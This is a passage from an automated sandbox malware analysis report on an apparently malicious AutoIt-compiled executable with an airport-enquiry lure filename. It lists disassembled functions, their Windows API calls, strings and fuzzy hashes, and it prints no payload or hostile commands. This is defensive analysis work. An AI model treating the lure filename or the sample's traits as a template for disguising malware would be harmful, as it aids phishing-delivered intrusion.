            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: LogonUser
            • String ID:
            • API String ID: 1244722697-0
            • Opcode ID: 2241b4734811c0e0754c347f2cc542201fd4149eb8b0d162542388e532d2bcac
            • Instruction ID: 5c9790ed6637460984094400e1ab5ac90e0d1a63e34b5392983ab5eed13241f7
            • Opcode Fuzzy Hash: 2241b4734811c0e0754c347f2cc542201fd4149eb8b0d162542388e532d2bcac
            • Instruction Fuzzy Hash: 06D05E3226060EABEF018FA4DC01EAF3B69EB04B01F408111FE15C51A1C775D835AB60
            Function 00CC2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
            Download Yara Rule
            APIs
            • GetUserNameW.ADVAPI32(?,?), ref: 00CC2242
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: NameUser
            • String ID:
            • API String ID: 2645101109-0
            • Opcode ID: 381e4444571f8922ba8b874fbbdaa35c089be0ba52fb18c33ac5d69880b5121a
            • Instruction ID: da212955ea2e6ee2ca5ac0a941b1e65eee931a35749310f8b58abc771d11761b
            • Opcode Fuzzy Hash: 381e4444571f8922ba8b874fbbdaa35c089be0ba52fb18c33ac5d69880b5121a
            • Instruction Fuzzy Hash: 82C04CF1C00209DBDB15DB91DA98EEE77BCAB04304F244055E545F2101D7749B448E71
            Function 00CAA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
            Download Yara Rule
            APIs
            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00CAA36A
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: 05ccd86343f9d38f44e16c11c7dc667c41c26e2cdd420e48466613b1c3b51a80
            • Instruction ID: 34fa88be6f74b1c3f5c54da05f45746a193a4569a1a16ea26ad716b21613cf1b
            • Opcode Fuzzy Hash: 05ccd86343f9d38f44e16c11c7dc667c41c26e2cdd420e48466613b1c3b51a80
            • Instruction Fuzzy Hash: DBA0123000420CA7CA001B41EC044447F5CD6001A07004020F40C80521877254104590
            Function 00C98A0E Relevance: .6, Instructions: 608COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1f9557c4532e407b5fb62d6a0d3fef92c06b52312604ccd357fb70f03906a981
            • Instruction ID: 97fbc0fbb39056a436b558d7414e8c087eb94ce4b76232dd6194e80e3e674001
            • Opcode Fuzzy Hash: 1f9557c4532e407b5fb62d6a0d3fef92c06b52312604ccd357fb70f03906a981
            • Instruction Fuzzy Hash: 40223830905616CBDF388F29C49867DB7A1EB03340F68486BD9629B391DB34DF89DB60
            Function 00CA2405 Relevance: .3, Instructions: 345COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
            • Instruction ID: 39ed6937710466dccc3d9cb9d415663a8b4aa4824c1e4f3b875890851f3c1d08
            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
            • Instruction Fuzzy Hash: 10C181322050B309DB6D467ED83413EBAE15AA37B531E075DE8B3CB5D4EF20D664E620
            Function 00CA283A Relevance: .3, Instructions: 341COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
            • Instruction ID: 58d3aad2247bf103394de673fb7e0b70fcf56e5a7566a7e1d90fd23ece6baa4d
            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
            • Instruction Fuzzy Hash: E8C184322051B30ADB6D467E983403EBBE15A937B531E075DE8B3DB5D4EF20D624A620
            Function 00CA1BB8 Relevance: .3, Instructions: 323COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
            • Instruction ID: dc8c64014096cbe2a691029a3e2e99a98377c9ef8dd0374b1a74baf7160e1a85
            • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
            • Instruction Fuzzy Hash: 21C172322051A30DDF6D467A983403EBAE15AA37B971E076DECB3CB5D4EF20D624D620
            Function 00CF7B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
            Download Yara Rule
            APIs
            • DeleteObject.GDI32(00000000), ref: 00CF7B70
            • DeleteObject.GDI32(00000000), ref: 00CF7B82
            • DestroyWindow.USER32 ref: 00CF7B90
            • GetDesktopWindow.USER32 ref: 00CF7BAA
            • GetWindowRect.USER32(00000000), ref: 00CF7BB1
            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00CF7CF2
            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00CF7D02
            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7D4A
            • GetClientRect.USER32(00000000,?), ref: 00CF7D56
            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00CF7D90
            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DB2
            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DC5
            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DD0
            • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DD9
            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DE8
            • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DF1
            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7DF8
            • GlobalFree.KERNEL32(00000000), ref: 00CF7E03
            • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7E15
            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00D12CAC,00000000), ref: 00CF7E2B
            • GlobalFree.KERNEL32(00000000), ref: 00CF7E3B
            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00CF7E61
            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00CF7E80
            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF7EA2
            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00CF808F
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
            • String ID: $AutoIt v3$DISPLAY$static
            • API String ID: 2211948467-2373415609
            • Opcode ID: 77cdf3c9e46e7422dca4353c369c5496102b8b7641749205002c1afc85f44188
            • Instruction ID: b88a75e08b49f9d718fcca3053e056f3f63f3bcc0681f0379ab621905f318fea
            • Opcode Fuzzy Hash: 77cdf3c9e46e7422dca4353c369c5496102b8b7641749205002c1afc85f44188
            • Instruction Fuzzy Hash: 09027C75900209EFDB14DFA4CC89EAE7BB9EB49314F148158F919EB3A1CB71AD01CB61
            Function 00D037F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
            Download Yara Rule
            APIs
            • CharUpperBuffW.USER32(?,?,00D0F910), ref: 00D038AF
            • IsWindowVisible.USER32(?), ref: 00D038D3
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: BuffCharUpperVisibleWindow
            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
            • API String ID: 4105515805-45149045
            • Opcode ID: c9786a52d254e6e8ed243b7ac0c1517832e9f073b03a7261339bdf3c1d7a6ef2
            • Instruction ID: 9bef24cb9f2e8cc2671e53b79fc40a4f79a4389ce0000dc9d1271bf1e4e0b67c
            • Opcode Fuzzy Hash: c9786a52d254e6e8ed243b7ac0c1517832e9f073b03a7261339bdf3c1d7a6ef2
            • Instruction Fuzzy Hash: 12D170342043069BCB14EF10C491B6AB7A9EF95358F14445DF9CA9B3E2CB31EE0ADB65
            Function 00D0A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
            Download Yara Rule
            APIs
            • SetTextColor.GDI32(?,00000000), ref: 00D0A89F
            • GetSysColorBrush.USER32(0000000F), ref: 00D0A8D0
            • GetSysColor.USER32(0000000F), ref: 00D0A8DC
            • SetBkColor.GDI32(?,000000FF), ref: 00D0A8F6
            • SelectObject.GDI32(?,?), ref: 00D0A905
            • InflateRect.USER32(?,000000FF,000000FF), ref: 00D0A930
            • GetSysColor.USER32(00000010), ref: 00D0A938
            • CreateSolidBrush.GDI32(00000000), ref: 00D0A93F
            • FrameRect.USER32(?,?,00000000), ref: 00D0A94E
            • DeleteObject.GDI32(00000000), ref: 00D0A955
            • InflateRect.USER32(?,000000FE,000000FE), ref: 00D0A9A0
            • FillRect.USER32(?,?,?), ref: 00D0A9D2
            • GetWindowLongW.USER32(?,000000F0), ref: 00D0A9FD
              • Part of subcall function 00D0AB60: GetSysColor.USER32(00000012), ref: 00D0AB99
              • Part of subcall function 00D0AB60: SetTextColor.GDI32(?,?), ref: 00D0AB9D
              • Part of subcall function 00D0AB60: GetSysColorBrush.USER32(0000000F), ref: 00D0ABB3
              • Part of subcall function 00D0AB60: GetSysColor.USER32(0000000F), ref: 00D0ABBE
              • Part of subcall function 00D0AB60: GetSysColor.USER32(00000011), ref: 00D0ABDB
              • Part of subcall function 00D0AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D0ABE9
              • Part of subcall function 00D0AB60: SelectObject.GDI32(?,00000000), ref: 00D0ABFA
              • Part of subcall function 00D0AB60: SetBkColor.GDI32(?,00000000), ref: 00D0AC03
              • Part of subcall function 00D0AB60: SelectObject.GDI32(?,?), ref: 00D0AC10
              • Part of subcall function 00D0AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00D0AC2F
              • Part of subcall function 00D0AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00D0AC46
              • Part of subcall function 00D0AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00D0AC5B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
            • String ID:
            • API String ID: 4124339563-0
            • Opcode ID: 2581bec91832b476782b9a0e6022672ba62db3e5e49dbb07b2c31034301dceaf
            • Instruction ID: 31ff6a772fb2951b7d62703dfebdfe0a79fed06b316430c6cb1ecd0e895feb0f
            • Opcode Fuzzy Hash: 2581bec91832b476782b9a0e6022672ba62db3e5e49dbb07b2c31034301dceaf
            • Instruction Fuzzy Hash: 22A18271108301AFD720DF68DC08B5B7BA9FF89321F244A29F96AD62E0D771D944CB62
            Function 00C82C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
            Download Yara Rule
            APIs
            • DestroyWindow.USER32(?,?,?), ref: 00C82CA2
            • DeleteObject.GDI32(00000000), ref: 00C82CE8
            • DeleteObject.GDI32(00000000), ref: 00C82CF3
            • DestroyIcon.USER32(00000000,?,?,?), ref: 00C82CFE
            • DestroyWindow.USER32(00000000,?,?,?), ref: 00C82D09
            • SendMessageW.USER32(?,00001308,?,00000000), ref: 00CBC68B
            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00CBC6C4
            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00CBCAED
              • Part of subcall function 00C81B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C82036,?,00000000,?,?,?,?,00C816CB,00000000,?), ref: 00C81B9A
            • SendMessageW.USER32(?,00001053), ref: 00CBCB2A
            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00CBCB41
            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00CBCB57
            • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00CBCB62
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
            • String ID: 0
            • API String ID: 464785882-4108050209
            • Opcode ID: a3f8cd9be3e8797335d235bc09120f0fabc90d549d4cb662675423feed122dbd
            • Instruction ID: a66b548e84c158123fec1fad71475c4032d4315c9b3b0a0109afad7a4e6d8946
            • Opcode Fuzzy Hash: a3f8cd9be3e8797335d235bc09120f0fabc90d549d4cb662675423feed122dbd
            • Instruction Fuzzy Hash: C6128F30604201EFEB24DF24C888BA9B7E5BF45314F544579F4AADB662CB31ED42DB61
            Function 00CF77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
            Download Yara Rule
            APIs
            • DestroyWindow.USER32(00000000), ref: 00CF77F1
            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CF78B0
            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CF78EE
            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CF7900
            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CF7946
            • GetClientRect.USER32(00000000,?), ref: 00CF7952
            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CF7996
            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CF79A5
            • GetStockObject.GDI32(00000011), ref: 00CF79B5
            • SelectObject.GDI32(00000000,00000000), ref: 00CF79B9
            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CF79C9
            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CF79D2
            • DeleteDC.GDI32(00000000), ref: 00CF79DB
            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CF7A07
            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CF7A1E
            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CF7A59
            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CF7A6D
            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CF7A7E
            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CF7AAE
            • GetStockObject.GDI32(00000011), ref: 00CF7AB9
            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CF7AC4
            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CF7ACE
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
            • API String ID: 2910397461-517079104
            • Opcode ID: 4711bd767d44773180f16430444c6faf18b347443146b2af19b452a25a977a3c
            • Instruction ID: 3d1f91c86f46225b9aa1dbb95aa4228d184897b01905ff6ccbf0f4cb6ebba4e8
            • Opcode Fuzzy Hash: 4711bd767d44773180f16430444c6faf18b347443146b2af19b452a25a977a3c
            • Instruction Fuzzy Hash: 36A16075A40209BFEB14DF64DC8AFAE7BA9EB45714F104214FA15E72E0C7B0AD04CB65
            Function 00CEAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
            Download Yara Rule
            APIs
            • SetErrorMode.KERNEL32(00000001), ref: 00CEAF89
            • GetDriveTypeW.KERNEL32(?,00D0FAC0,?,\\.\,00D0F910), ref: 00CEB066
            • SetErrorMode.KERNEL32(00000000,00D0FAC0,?,\\.\,00D0F910), ref: 00CEB1C4
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ErrorMode$DriveType
            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
            • API String ID: 2907320926-4222207086
            • Opcode ID: 03a1bc20cdfd0d71c60f0cbec6988f28d80d6f5a94b064551954870d1e079178
            • Instruction ID: 0379116ce52902d965f1888bf73f0ba73218bbd283f5cbbf7beb45e6cd02c3a3
            • Opcode Fuzzy Hash: 03a1bc20cdfd0d71c60f0cbec6988f28d80d6f5a94b064551954870d1e079178
            • Instruction Fuzzy Hash: B451D370780385EFCB14EB17C9D2DBF73B0EB14355B244026E45AA7290C775AE45EB62
            Function 00C86A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
            Download Yara Rule
            APIs
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __wcsnicmp
            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
            • API String ID: 1038674560-86951937
            • Opcode ID: 74a2c353454121a6d88d37af435e821d23d115aeb5e13e8aae64bf2873dcfcde
            • Instruction ID: d7a3ed16522e3c4add2e7f992a07c490d1c5fcdcdae0668a4d35a0d7bdca9f34
            • Opcode Fuzzy Hash: 74a2c353454121a6d88d37af435e821d23d115aeb5e13e8aae64bf2873dcfcde
            • Instruction Fuzzy Hash: 8D811471600256BBCB24BB60CC92FFB7768AF12708F144024F945AA1C2EB65DF55F3A9
            Function 00D0AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
            Download Yara Rule
            APIs
            • GetSysColor.USER32(00000012), ref: 00D0AB99
            • SetTextColor.GDI32(?,?), ref: 00D0AB9D
            • GetSysColorBrush.USER32(0000000F), ref: 00D0ABB3
            • GetSysColor.USER32(0000000F), ref: 00D0ABBE
            • CreateSolidBrush.GDI32(?), ref: 00D0ABC3
            • GetSysColor.USER32(00000011), ref: 00D0ABDB
            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00D0ABE9
